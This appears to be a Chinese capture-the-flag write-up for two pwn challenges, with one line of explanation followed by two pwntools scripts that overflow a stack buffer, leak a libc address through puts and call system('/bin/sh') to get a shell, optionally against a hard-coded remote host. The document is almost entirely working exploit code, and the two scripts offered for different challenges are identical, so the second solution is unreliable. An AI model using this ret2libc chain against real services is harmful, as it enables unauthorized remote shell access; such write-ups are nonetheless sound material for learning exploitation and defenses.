思路:题目分为低级魔法和高级魔法两部分。经分析,两题均在选项四处存在栈溢出漏洞,我都使用了 ret2libc 的方法,成功获得 shell。
低级魔法脚本:
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
# Module-level configuration shared with pwn() below.
context.log_level = "debug"  # pwntools: log every byte sent/received, useful for matching prompts
elf = ELF("pwn")  # the challenge binary; pwn() reads its puts@plt and __libc_start_main@got addresses
debugg=1 #0 = connect to the remote service, 1 = run ./pwn locally
sh = 0.  # placeholder for the pwntools tube (process or remote); rebound inside pwn()
lib = 0  # placeholder for a local libc ELF; only referenced by commented-out code in pwn()
def pwn(ip,port,debug):
    """Drive the challenge binary through the author's two-stage ret2libc chain.

    Stage 1 (leak): choose menu option 4, overflow the buffer with 22 bytes of
    filler and return into puts@plt with the GOT slot of __libc_start_main as
    argument, so the program prints that symbol's runtime address.
    Stage 2 (call): resolve the libc build with LibcSearcher from the leaked
    address, choose option 4 again and return into system("/bin/sh").

    Args:
        ip: remote host, used only when ``debug`` is not 1.
        port: remote port, used only when ``debug`` is not 1.
        debug: 1 runs the local ``./pwn`` binary, anything else connects remotely.

    Side effects: rebinds the module global ``sh`` to the pwntools tube and
    ends in ``sh.interactive()``, so it does not return normally. ``lib`` is
    declared global but only used by commented-out code.

    Defensive note: the chain depends on three properties of the target — an
    overflow that reaches the saved return address without being detected
    (no effective stack protector), fixed code/GOT addresses (the hard-coded
    0x0804xxxx values suggest a non-PIE 32-bit ELF), and an information leak
    to defeat libc ASLR. Stack canaries, PIE, or removing the leak would each
    break this particular exploit.
    """
    global sh
    global lib
    if(debug == 1):
        sh = process("./pwn")
    else:
        sh = remote(ip,port)
    #lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")
    #catFlag = 0x08048847
    offset = 22  # bytes of filler before the saved return address (author-determined)
    sh.recv()  # drain the menu banner
    sh.sendline("4")  # option 4: the vulnerable input path
    sh.recvuntil("You are one step short of success\n")
    # Stage 1 payload: filler | puts@plt | 0x0804862E | &__libc_start_main@got.
    # puts() receives the GOT slot as its argument and prints its contents;
    # 0x0804862E is presumably where execution continues after puts — the page
    # does not say what it points to, so confirm against the binary.
    payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])
    sh.send(payload1)  # author's note: this send should probably be sendline
    addr__libc_start_main=u32(sh.recv(4))  # leaked runtime address of __libc_start_main
    obj = LibcSearcher("__libc_start_main", addr__libc_start_main)  # identify the libc build from one symbol address
    baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")  # libc load base
    addr_system=baseaddr_libc+obj.dump("system")  # runtime address of system()
    addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")  # runtime address of the "/bin/sh" string
    #print addr_system
    #print addr_binsh
    #addr_read=baseaddr_libc+obj.dump("read")
    sh.sendline("4")  # trigger the same overflow a second time
    sh.recv()
    #addr_bss=0x0804a040
    #pppr=0x0804876d
    #payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #/bin/sh\x00 is 8 bytes in total
    # Stage 2 payload: filler | system | dummy return (0x11111111) | &"/bin/sh".
    payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)
    sh.sendline(payload2)
    #sh.send("/bin/sh\x00")
    sh.interactive()  # hand the tube to the user; does not return
# Entry point: local ./pwn when debugg == 1, otherwise the remote host/port below.
if __name__ == "__main__":
    pwn("101.132.100.243",10011,debugg)
高级魔法脚本:
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
# Module-level configuration shared with pwn() below.
context.log_level = "debug"  # pwntools: log every byte sent/received, useful for matching prompts
elf = ELF("pwn")  # the challenge binary; pwn() reads its puts@plt and __libc_start_main@got addresses
debugg=1 #0 = connect to the remote service, 1 = run ./pwn locally
sh = 0.  # placeholder for the pwntools tube (process or remote); rebound inside pwn()
lib = 0  # placeholder for a local libc ELF; only referenced by commented-out code in pwn()
def pwn(ip,port,debug):
    """Drive the challenge binary through the author's two-stage ret2libc chain.

    Stage 1 (leak): choose menu option 4, overflow the buffer with 22 bytes of
    filler and return into puts@plt with the GOT slot of __libc_start_main as
    argument, so the program prints that symbol's runtime address.
    Stage 2 (call): resolve the libc build with LibcSearcher from the leaked
    address, choose option 4 again and return into system("/bin/sh").

    Args:
        ip: remote host, used only when ``debug`` is not 1.
        port: remote port, used only when ``debug`` is not 1.
        debug: 1 runs the local ``./pwn`` binary, anything else connects remotely.

    Side effects: rebinds the module global ``sh`` to the pwntools tube and
    ends in ``sh.interactive()``, so it does not return normally. ``lib`` is
    declared global but only used by commented-out code.

    Defensive note: the chain depends on three properties of the target — an
    overflow that reaches the saved return address without being detected
    (no effective stack protector), fixed code/GOT addresses (the hard-coded
    0x0804xxxx values suggest a non-PIE 32-bit ELF), and an information leak
    to defeat libc ASLR. Stack canaries, PIE, or removing the leak would each
    break this particular exploit.
    """
    global sh
    global lib
    if(debug == 1):
        sh = process("./pwn")
    else:
        sh = remote(ip,port)
    #lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")
    #catFlag = 0x08048847
    offset = 22  # bytes of filler before the saved return address (author-determined)
    sh.recv()  # drain the menu banner
    sh.sendline("4")  # option 4: the vulnerable input path
    sh.recvuntil("You are one step short of success\n")
    # Stage 1 payload: filler | puts@plt | 0x0804862E | &__libc_start_main@got.
    # puts() receives the GOT slot as its argument and prints its contents;
    # 0x0804862E is presumably where execution continues after puts — the page
    # does not say what it points to, so confirm against the binary.
    payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])
    sh.send(payload1)  # author's note: this send should probably be sendline
    addr__libc_start_main=u32(sh.recv(4))  # leaked runtime address of __libc_start_main
    obj = LibcSearcher("__libc_start_main", addr__libc_start_main)  # identify the libc build from one symbol address
    baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")  # libc load base
    addr_system=baseaddr_libc+obj.dump("system")  # runtime address of system()
    addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")  # runtime address of the "/bin/sh" string
    #print addr_system
    #print addr_binsh
    #addr_read=baseaddr_libc+obj.dump("read")
    sh.sendline("4")  # trigger the same overflow a second time
    sh.recv()
    #addr_bss=0x0804a040
    #pppr=0x0804876d
    #payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #/bin/sh\x00 is 8 bytes in total
    # Stage 2 payload: filler | system | dummy return (0x11111111) | &"/bin/sh".
    payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)
    sh.sendline(payload2)
    #sh.send("/bin/sh\x00")
    sh.interactive()  # hand the tube to the user; does not return
# Entry point: local ./pwn when debugg == 1, otherwise the remote host/port below.
if __name__ == "__main__":
    pwn("101.132.100.243",10011,debugg)